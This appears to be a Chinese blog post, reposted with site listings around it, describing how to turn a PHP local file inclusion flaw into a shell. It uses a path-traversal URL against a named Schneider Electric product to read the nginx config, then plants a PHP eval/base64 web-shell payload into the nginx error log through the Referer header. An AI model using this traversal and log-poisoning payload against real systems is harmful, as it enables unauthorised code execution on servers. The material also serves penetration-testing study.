php nginx 0day,利用nginx日志结合本地包含漏洞GetShell

最新推荐文章于 2023-04-24 17:11:31 发布
最新推荐文章于 2023-04-24 17:11:31 发布
阅读量314 收藏
点赞数
文章标签: php nginx 0day

0前言

在WEB渗透测试中尤其是PHP,经常会挖到LFI漏洞,想要GETSHELL,但无奈没有文件上传的途径,这里给一个思路,抛砖引玉。

近日施耐德电气爆出的漏洞,首先得到了一个本地包含,在这里作为靶目标使用。

1460000009809355

1.本地获得利用思路

umotion/themes/schneider/include/css.php?css=../../../../../../../etc/nginx&theme=ivory&version=11028

1.1 得到nginx配置

通过文件包含,枚举得到nginx的配置文件。

/etc/nginx/nginx.conf

1460000009809356?w=676&h=530

配置文件中获得了nginx错误日志的路径,且关闭了访问日志。

error_log /var/log/nginx_error.log;

access_log off;

1.2 利用思路整理

那么我们可以利用错误日志来构造合法的php代码,从而利用包含漏洞。

下面可以很直观想到的几个问题:

何时才会向nginx错误日志写入错误内容。

如何控制我们写入的内容。

如果遇到转义写入如何绕过。

目前知道的情况:

目标系统为nginx + FastCGI + php架构。

2.了解何时会向nginx错误日志写入内容。

通过观察日志可以很容易发现,如果请求为404/403等异常错误码,或者FastCGI返回出错信息,均会记录到nginx错误日志中,

1460000009809357?w=778&h=362

2017/06/15 17:27:37 [error] 23229#0: *29454 open() "/web/html/favicon.ico" failed (2: No such file or directory), client:

3.控制我们写入的内容

可以很容易发现,我们的请求PATH会被写入到错误日志中(请求路径不存在)。且携带我们的IP信息,以及HTTP头部的referrer。那么我们就可以利用这两点来构造。

4.绕过转义

这时候写入

我们构造

host/xx/?<?php eval(base64_decode($__REQUEST[fob]));?>

如果通过webkit内核浏览器访问,webkit会自动转移,直接通过curl发送。

这里使用referrer来注入代码到错误日志中。还好nginx端没有进行任何转义,如果遇到转义则需要见机行事,构造可用payload。

1460000009809358?w=679&h=116

最后成功写入向错误日志中注入php代码。

5.总结

其实没什么技术含量,只是经常会遇到这种情况,包括各种日志,apache,nginx等。这里只提供一个思路。设置站点权限的时候,这些点可以关注下,包括读取日志得到敏感信息(后台,管理员信息等)。

本文永久地址[利用nginx日志结合本地包含漏洞GetShell],转载请注明出处。

追风的树叶
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
shell版Nginx日志蜘蛛爬取查看脚本
09-15
Shell脚本是Linux/Unix系统中用于自动化任务的编程语言,它可以帮助用户高效地处理文本文件,例如Nginx日志文件。在这个特定的场景中,我们有一个专门用于查看Nginx日志中搜索引擎蜘蛛爬取活动的shell脚本。Nginx...
nginx日志切割shell脚本
01-10
第一步就是重命名日志文件,不用担心重命名后nginx找不到日志文件而丢失日志。在你未重新打开原名字的日志文件前,nginx还是会向你重命名的文件写日志,linux是靠文件描述符而不是文件名定位文件。 第二步向nginx主...
网站渗透总结之Getshell用法大全
LinkSLA的博客
11-07 2258
后台数据库备份getshell,上传图片马并获取图片马路径,通过数据库备份修改后缀名,如有后缀名无法修改或路径无法修改限制可修改前端代码绕过,当所备份的数据库来源无法修改时,我们可以通过首先将一句话木马写入数据库
生命在于学习——网站Getshell的方法
易水哲的博客
09-08 3656
网站Getshell的方法
【关于nginx升级---存在0day漏洞
✨ 欢迎来到【Seal ^_^ 的CSDN博客】!这里是我记录技术心得、分享经验的地方。✨
11-10 1万+
0day漏洞——又称“零日漏洞”(zero-day),是漏洞已经被发现(有可能未被公开),但是官方还没有发布相关补丁的漏洞
php本地包含漏洞日志,利用nginx日志结合本地包含漏洞GetShell
weixin_42345868的博客
03-28 334
0前言在WEB渗透测试中尤其是PHP,经常会挖到LFI漏洞,想要GETSHELL,但无奈没有文件上传的途径,这里给一个思路,抛砖引玉。近日施耐德电气爆出的漏洞,首先得到了一个本地包含,在这里作为靶目标使用。1.本地获得利用思路umotion/themes/schneider/include/css.php?css=../../../../../../../etc/nginx&theme=i...
关于 Nginx 0day 漏洞,需要采取哪些措施?
技术宅,专注云原生、Go、Linux、Java等技术分享,原创文章、效率工具、实战解决方案!关注我,了解互联网动态,学 IT 不迷路
08-01 2082
黑客组织 BlueHornet 在推特上发布了有关 NGINX 1.18 的实验性漏洞,并警告受其影响的公司。4 月 10 日,BlueHornet 声称利用 NGINX 漏洞入侵了瑞银证券中国分行。
Nginx日志自动归档备份shell脚本log.sh
最新发布
12-24
Nginx日志自动归档备份shell脚本log
Crontab+Shell做Nginx日志切割脚本实例代码
09-30
【Crontab+Shell做Nginx日志切割脚本】是Linux系统中常见的日志管理方式,主要用于解决日志文件过大导致的问题。Nginx作为一款广泛应用的Web服务器,其产生的日志文件可能会随着时间积累变得非常庞大,占用大量磁盘...
Nginx升级
小志的博客
04-24 273
【代码】Nginx升级。
nginx日志分别过滤出GET和POST请求,以及每个请求的使用情况
Mankel
07-02 1598
首先先停止摸鱼 然后放上nginx日志的格式: 注:看需求,先分别过滤出GET和POST请求(因为命令是重复的,只有关键词不一样,文件名称,所以就关于POST的部分就不打出来了) 1.这里使用sort -u去重,相同时间的相同访问视为无效请求 grep "GET" access.log-20210701 |sort -u > get_0701.txt 2.$7对应的是参数部分,将该请求以及请求次数给计算出来存到临时文件bb.txt(没什么含义,随便打的) awk '{a[$7]++}END{for
php提取nginx日志增量,从nginx日志中提取爬虫信息
weixin_39601511的博客
04-07 260
Update:2016.03.26 发现有伪装成googlebot的client,严格筛选进入爬虫信息统计的日志,增加请求类型为GET的条件&& $2~/GET/ 。一般来说,搜索引擎爬虫不会执行页面上的JavaScript代码,而网站分析工具大多又是基于JavaScript代码的,这也就是说,默认情况下,网站分析工具不能记录到搜索引擎爬虫这部分的流量。但搜索引擎爬虫数据对于SE...
「bug」目前Nginx 1.21.5以下具有0day风险
掘金者说
08-01 4234
截至2022年7月31日15时,Nginx官方仍未透露关于该0day漏洞的细节以及POC,不过从Nginx官方下载网站中,我们可以明显地看到已经下线了1.21版本的下载地址。从Nginx官方的可疑行为中,我们能够大胆猜测是否其已经发现了该漏洞的存在,并且封锁消息。目前微步云社区已经对该0day漏洞进行高价悬赏,并且其希望提供有效的信息与线索。......
nginx平滑升级解决 nginx 安全漏洞(CVE-2021-23017)和NGINX 环境问题漏洞(CVE-2019-20372)
热门推荐
weixin_44460932的博客
06-14 1万+
关于漏洞扫描nginx安全漏洞的修复。 服务器漏洞扫描中扫出了nginx的安全漏洞nginx 安全漏洞(CVE-2021-23017)和NGINX 环境问题漏洞(CVE-2019-20372),受影响版本为0.6.18-1.20.0;给出解决办法为升级补丁修复,由于漏洞较多考虑平滑升级。 官方下载渠道下载1.20.0以上版本的linux。下载地址: http://nginx.org/en/download.html 我使用的服务器是linux系统,推荐下载官网Stable version的1.22.0版
解决nginx 安全漏洞(CVE-2021-23017)-附nginx1.21安装脚本。
weixin_45829963的博客
07-30 1万+
绿盟扫描到服务器nginx漏洞,这个漏洞nginx的1.20版本之前都有存在,要不打补丁修复,要不升级nginx到1.20版本。 补丁升级有点麻烦,我选择直接从官方下载nginx.1.21源码包。 http://nginx.org/en/download.html 下载安装包后,将源码包上传至/root下。 #编译包与安装脚本需放在/root下 #判断系统类型是否为centos #---------------------------------------环境检查------------------
80后发现nginx 0day漏洞百万服务器受威胁
weixin_34007879的博客
05-26 236
 国内顶级安全团队80sec于5.20日下午6点发布了一个关于nginx漏洞通告,由于该漏洞的存在,使用nginx+php组建的网站只要允许上传图片就可能被******,直到5.21日凌晨,nginx尚未发布修复该漏洞的补丁;已经有一些网站被黑了,管理员速修复!  没错,重申一次,由于nginx漏洞,这100万台服务器可能通过上传图片的方法被***轻易的植入***。...
NGINX 工具的使用
weixin_45965343的博客
03-06 918
NGINX 1.背景 1.1 高并发场景下的问题 问题: 在开发好的项目真正上线后,一旦访问的并发量上升,由于大量的并发涌入,往往会造成服务器运行时的各种问题,包括服务器并发压力、数据库访问压力、数据库数据量限制等等。我将在后面的分享中讨论问题的产生和解决的方案。本章主要与大家分享服务器并发压力的解决方案。 1.2 服务器的并发压力 1.问题的产生: 我们都知道在学习tomcat时,单台tomca...
NGINX 0 DAY LDAP RCE 漏洞来龙去脉
u012516914的专栏
07-30 2538
背景nginx 0 day RCE 漏洞影响 nginx 18.1。根据 AgainstTheWest Github https://github.com/AgainstTheWest/NginxDay 存储库,此错误与 nginx 中的 LDAP-auth 守护程序有关,因为 LDAP 与 Nginx 的交互不多,但是,有一个与 Nginx 一起使用的 ldap-aut...
php nginx 0day,CVE-2019-11043: PHP-FPM在Nginx特定配置下任意代码执行漏洞预警
weixin_32060429的博客
03-22 108
0x00 漏洞背景2019年10月23日, 360CERT监测到 PHP 官方发布了在nginx配置不当的情况下 php-fpm 可导致远程代码执行的漏洞更新。360CERT判断漏洞等级为中危,影响面有限。但由于是配置文件的开放性。还请使用nginx+php-fpm的服务管理员/运维人员及时做好自查自检工作。0x01 漏洞详情进而导致可以通过FCGI_PUTENV与PHP_VALUE相结合...
nginx 0day
08-17
Nginx 0day是指Nginx的一个零日漏洞,其中涉及到了Nginx的LDAP-auth守护程序。该漏洞的影响范围是Nginx版本18.1。根据AgainstTheWest的GitHub存储库,该漏洞主要与Nginx中的LDAP-auth守护程序有关,该守护程序与...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值